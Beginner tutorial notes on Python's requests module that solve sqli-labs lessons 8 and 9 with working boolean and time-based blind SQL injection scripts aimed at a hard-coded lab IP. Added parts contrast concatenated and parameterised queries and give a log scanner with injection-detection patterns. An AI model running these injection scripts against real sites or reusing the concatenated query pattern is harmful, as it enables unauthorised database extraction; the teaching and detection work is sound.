Notes on solving blind and time-based SQL injection with Python
The requests module
To solve this problem with Python you need to know the requests module. I downloaded PyCharm, which ships with this module, so there was nothing to install; if you do need to install it, running `pip install requests` does the job. Next, some of the functions of the requests module:
| GET request | POST request |
|---|---|
| `res = requests.get(url, params=data)` | `res = requests.post(url, data=data)` |
Here `res` is short for response.
There are also many parameters that can go inside the parentheses:
1. `url`
2. `headers`
3. `params` (GET request)
4. `data` (POST request)
5. `files`
6. `cookies`
and so on.
- `res.text` the response body as text
- `res.status_code` the response status code (e.g. 200)
- `res.encoding` the page encoding
- `res.content` the response body as bytes
- `res.headers` the response headers
- `res.cookies` the cookies
In short, requests is a powerful module: it can customise headers, pass GET parameters, pass POST data, upload files, follow redirects, track sessions, carry cookie information, and so on.
To get familiar with this module, I use it to solve the blind injection and time-based injection problems in SQL labs. Here I only go as far as dumping the database name. Straight to the code screenshots:
Solving time-based injection
```python
import requests
import string

url = "http://43.247.91.228:84/Less-9/"

def iftimeout(url):
    # A request that does not answer within 3 s (or fails otherwise) counts as a timeout
    try:
        res = requests.get(url, timeout=3)
        return res.text
    except Exception as e:
        return "timeout"

# Brute-force the database name length; the length turns out to be 8
dbnamelen = 0
while True:
    dbnamelen += 1
    dbnamelen_url = url + "?id=1'+and+if(length(database())=" + str(dbnamelen) + ",sleep(5),1)--+"
    print(dbnamelen_url)
    if "timeout" in iftimeout(dbnamelen_url):
        print("DB name length:", dbnamelen)
        break

# Brute-force the database name, one character at a time
dbname = ""
for i in range(1, 9):
    for j in string.ascii_lowercase:
        dbname_url = url + "?id=1'+and+if(substr(database()," + str(i) + ",1)='" + j + "',sleep(5),1)--+"
        print(dbname_url)
        if "timeout" in iftimeout(dbname_url):
            dbname += j
            print("DB name:", dbname)
            break
```
The dumped database name (screenshot).
Solving blind injection
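Both scripts only work because the lab's handler splices `id` straight into the SQL text, so a true condition and a false condition produce different responses (a delay, or a different page). The following is an added example, not code from these notes or from sqli-labs: it uses an in-memory SQLite table (the table name, columns and rows are assumptions) to show the vulnerable concatenation next to a bound-parameter version, and a small check that reports whether a boolean probe of the kind used above can distinguish true from false through each one.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the lab's users table (assumption, not the real schema)
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn

def lookup_concat(conn, user_id):
    # Vulnerable pattern: the request parameter becomes part of the SQL text,
    # which is the shape of the lab's "?id=1" handler
    sql = "SELECT username FROM users WHERE id='" + user_id + "' LIMIT 1"
    return [row[0] for row in conn.execute(sql)]

def lookup_param(conn, user_id):
    # Hardened form: the value is bound as a parameter, so it is only ever
    # compared against the id column and cannot change the query's structure
    sql = "SELECT username FROM users WHERE id=? LIMIT 1"
    return [row[0] for row in conn.execute(sql, (user_id,))]

def oracle_visible(lookup, conn):
    # True if a boolean probe can tell a true condition from a false one through
    # this lookup, i.e. the blind-injection oracle exists
    true_probe = "1' and length('abc')=3 --"
    false_probe = "1' and length('abc')=4 --"
    return lookup(conn, true_probe) != lookup(conn, false_probe)

if __name__ == "__main__":
    conn = make_db()
    print("concat:", lookup_concat(conn, "1"), "oracle:", oracle_visible(lookup_concat, conn))
    print("param: ", lookup_param(conn, "1"), "oracle:", oracle_visible(lookup_param, conn))
```

With concatenation the true probe returns `alice` and the false probe returns nothing, which is exactly the page-length difference the blind script keys on; with the bound parameter both probes return nothing, because the whole string is compared against `id` as a value rather than parsed as SQL.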
```python
import requests
import string

url = "http://43.247.91.228:84/Less-8/"

# Page length for a true condition; a false condition returns a different page
htmlLen = len(requests.get(url=url + "?id=1").text)
print("the len of HTML:" + str(htmlLen))

# Brute-force the database name length
dbNameLen = 0
while True:
    dbNameLen_url = url + "?id=1'+and+length(database())=" + str(dbNameLen) + "--+"
    print(dbNameLen_url)
    if len(requests.get(dbNameLen_url).text) == htmlLen:
        print("the length of dbName:" + str(dbNameLen))
        break
    if dbNameLen == 30:
        # Stop instead of looping forever when no length up to 30 matches
        print("Error!")
        break
    dbNameLen += 1

# Brute-force the database name, one character at a time
dbName = ""
for i in range(1, 9):
    for j in string.ascii_lowercase:
        dbName_url = url + "?id=1'+and+substr(database()," + str(i) + ",1)='" + j + "' --+"
        if len(requests.get(dbName_url).text) == htmlLen:
            dbName += j
            print(dbName)
            break
```
The database name it produces is the same as in the screenshot above.
Summary
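Seen from the server side, both scripts leave a very recognisable trail: dozens of requests from one client whose `id` parameter contains `sleep(`, `length(database())` or `substr(database(),…)`, and, for the time-based variant, a response time that jumps only on the requests where the guessed condition was true. The following is an added example, not part of these notes: a small stdlib-only scanner over constructed access-log lines (the format, IPs and timestamps are made up; the last field is an assumed response time in milliseconds) that tags each request as a time-based or boolean probe, notes when a `sleep` actually fired, and counts the tags per client.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed sample log: common log format plus an assumed response-time field (ms)
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-9/?id=1 HTTP/1.1" 200 812 12
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-9/?id=1'+and+if(length(database())=7,sleep(5),1)--+ HTTP/1.1" 200 812 15
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-9/?id=1'+and+if(length(database())=8,sleep(5),1)--+ HTTP/1.1" 200 812 5012
10.0.0.5 - - [01/Jan/2024:10:00:08 +0000] "GET /Less-8/?id=1%27+and+substr(database(),1,1)=%27s%27+--+ HTTP/1.1" 200 812 11
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /Less-8/?id=2 HTTP/1.1" 200 790 10
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<bytes>\d+) (?P<ms>\d+)$'
)
TIME_PROBE_RE = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)
BOOL_PROBE_RE = re.compile(r"\b(?:length|substr(?:ing)?)\s*\(\s*database\s*\(", re.I)
SLOW_MS = 3000  # above the lab's normal response time, below the scripts' sleep(5)

def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Decode %xx escapes and turn '+' into spaces, the way the probe URLs use '+'
    rec["decoded"] = unquote_plus(rec["path"])
    rec["ms"] = int(rec["ms"])
    return rec

def classify(rec):
    """Return the detection tags that apply to one parsed request."""
    tags = []
    q = rec["decoded"]
    if TIME_PROBE_RE.search(q):
        tags.append("time_based_probe")
        if rec["ms"] >= SLOW_MS:
            # The delay actually happened: the probed condition was true
            tags.append("sleep_fired")
    elif BOOL_PROBE_RE.search(q):
        tags.append("boolean_probe")
    return tags

def scan(log_text):
    """Aggregate tags per client IP; clients with no tagged requests are omitted."""
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for tag in classify(rec):
            per_ip[rec["ip"]][tag] += 1
    return dict(per_ip)

if __name__ == "__main__":
    for ip, counts in scan(SAMPLE_LOG).items():
        print(ip, dict(counts))
```

Only `10.0.0.5` is reported, with two time-based probes (one of which fired the sleep) and one boolean probe; the plain `?id=2` request from the other client is left alone. In practice the per-client counts are what matter: a single probe can be noise, while a steady run of them from one source is the character-by-character loop these scripts perform.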
Python is a great thing, so learn it well!!!
These are also my summary notes from watching tutorial videos; they are very basic, so please go easy on me.